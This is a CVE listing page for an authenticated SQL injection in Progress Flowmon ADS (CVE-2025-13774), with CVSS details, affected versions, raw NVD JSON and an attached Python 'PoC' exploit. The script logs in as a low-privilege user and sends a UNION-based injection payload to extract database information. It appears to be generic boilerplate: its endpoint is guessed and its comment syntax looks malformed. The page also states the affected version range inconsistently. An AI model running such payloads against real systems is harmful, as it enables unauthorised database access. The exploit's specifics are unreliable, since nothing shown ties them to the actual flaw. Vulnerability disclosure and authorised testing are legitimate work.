Security Vulnerability Report
中文
CVE-2025-13774 CVSS 8.8 HIGH

CVE-2025-13774

Published: 2026-01-13 13:15:58
Last Modified: 2026-02-05 21:17:27

Description

A vulnerability exists in Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 where an SQL injection vulnerability allows authenticated users to execute unintended SQL queries and commands.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:progress:flowmon_anomaly_detection_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:flowmon_anomaly_detection_system:*:*:*:*:*:*:*:* - VULNERABLE
Progress Flowmon ADS < 12.5.4
Progress Flowmon ADS < 13.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13774 PoC - SQL Injection in Progress Flowmon ADS # Authentication required (low privilege user) TARGET_URL = "https://target-host.com" USERNAME = "low_privilege_user" PASSWORD = "password" def login(): """Authenticate to Flowmon ADS""" session = requests.Session() login_url = f"{TARGET_URL}/api/login" data = {"username": USERNAME, "password": PASSWORD} response = session.post(login_url, json=data, verify=False, timeout=30) return session if response.status_code == 200 else None def exploit_sqli(session): """Execute SQL injection to extract database info""" # SQL Injection payload - UNION-based injection # Target parameter varies based on enumeration injection_payload = "1' UNION SELECT NULL,version(),user(),database()---" vuln_url = f"{TARGET_URL}/api/search/query" params = {"q": injection_payload} try: response = session.get(vuln_url, params=params, verify=False, timeout=30) if response.status_code == 200: print(f"[+] Injection successful!") print(f"Response: {response.text}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-13774 - Progress Flowmon ADS SQL Injection") session = login() if session: print("[+] Authentication successful") exploit_sqli(session) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13774", "sourceIdentifier": "[email protected]", "published": "2026-01-13T13:15:57.673", "lastModified": "2026-02-05T21:17:26.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 where an SQL injection vulnerability allows authenticated users to execute unintended SQL queries and commands."}, {"lang": "es", "value": "Existe una vulnerabilidad en las versiones de Progress Flowmon ADS anteriores a la 12.5.4 y la 13.0.1 donde una vulnerabilidad de inyección SQL permite a usuarios autenticados ejecutar consultas y comandos SQL no deseados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:flowmon_anomaly_detection_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndIncluding": "12.5.4", "matchCriteriaId": "A2C0B806-2C9A-4346-B73E-AE301E4E5B9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:flowmon_anomaly_detection_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.0.0", "versionEndIncluding": "13.0.1", "matchCriteriaId": "30CFE0AC-3BA0-45C9-83F1-780779492855"}]}]}], "references": [{"url": "https://community.progress.com/s/article/Flowmon-ADS-CVE-2025-13774", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}